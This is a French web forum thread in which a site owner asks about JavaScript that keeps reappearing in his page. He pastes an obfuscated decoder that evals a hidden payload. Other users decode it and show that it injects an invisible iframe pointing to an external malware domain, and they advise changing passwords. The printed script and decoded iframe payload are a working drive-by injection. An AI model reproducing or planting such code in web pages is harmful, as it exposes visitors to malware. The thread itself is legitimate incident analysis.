Discussion :

[lapoisse]

Il y a à peu près une semaine de ça le forum m'a aidé à solutionner mon problème qui n'était pas des moindre car mon site internet avait disparru de l'IE. J'ai enfin trouvé des lignes de codes qui n'avaient rien à faire là donc après les avoir éffacées la site est aparru sans problème et sans alerte au virus mais me revoilà dans le même cas de figure et je retrouve directement et à la même place les lignes éffacées soit :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<body><script language=JavaScript>function oumwnbn51(b){ var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,16,59,8,57,56,53,43,12,41,0,0,0,0,0,0,58,33,40,21,22,44,45,4,30,50,7,14,26,61,0,55,36,37,47,27,38,39,25,5,13,62,34,0,0,0,0,32,0,23,49,51,52,1,10,3,42,54,31,9,6,35,60,28,29,48,24,19,17,18,46,15,2,20,11);for(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(218^n&255);n>>=8;j-=2}else{j=6}}}eval(p);}}oumwnbn51('FKzFYDS7dUh72@@79HH0HDzF0ij5YDSvRH2Rd@fMFZ@EvY7nMSYEnZ@vOY7Ydv2F0HKRZcH@@Ufh4HKYI@h7hxHM6zYvY@2EvKSFdu0EdISF62LMQOjnav77Iuwh6YfFYf0Q2@hEdm@vd@SFOf0nq2v@7mv5cJj0nfK29OjnMmRYFK7Rvf2490K@@z2Rci7EvHY@72vY9@@BiY24522E9hhF2Kf5dDzF0Zw4Ta0EnZ@vOYz4Mww')</script><!-- 82.165.114.206 -->

Est ce que quelqun pourrait m'expliquer ce que c'est (je suis novice et ne comprends rien au code) et comment je m'en débarrasse de manière définitive ?
Merci d'avance

[Maxoo]

C'est surement un code malveillant, qui essaie de faire télécharger un virus à la personne qui se connecte sur ton site ?

Mais relis bien ton précédent post :
http://www.developpez.net/forums/d67...ouvre-plus-ie/

Tu viens de te faire hacker ton site, il faut que tu changes tous les mot de passes, que tu le sécurises etc ...

[SpaceFrog]

en empechant le scrip d'evaleur le code et en en faisant un alert voici ce que l'on obtient ... cf pièce jointe

en fait cela colle un iframe dans la page qui charge une page avec contournement de cache ...
après que fait cette page .... ????

[le_chomeur]

je viens de regarder ce que le code faisait :
il créer une frame dans ta page , pointant vers une url avec des paramètres, rien de plus :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
window.status='Done';document.write('<iframe name=f863 src="http://8addition.info/t/?'+Math.round(Math.random()*40128)+'f863'+'" width=352 height=114 style="display:none"></iframe>')

[Maxoo]

http://www.malwaredomainlist.com/mdl...tity=50&page=0

Je pense que c'est un site qui essaie de te transmettre des malwares ?

[le_chomeur]

j'ai testé le code
( je suis sur le pc du boulot donc ... )

et il ne fait pas grand chose sous FF en tous cas ...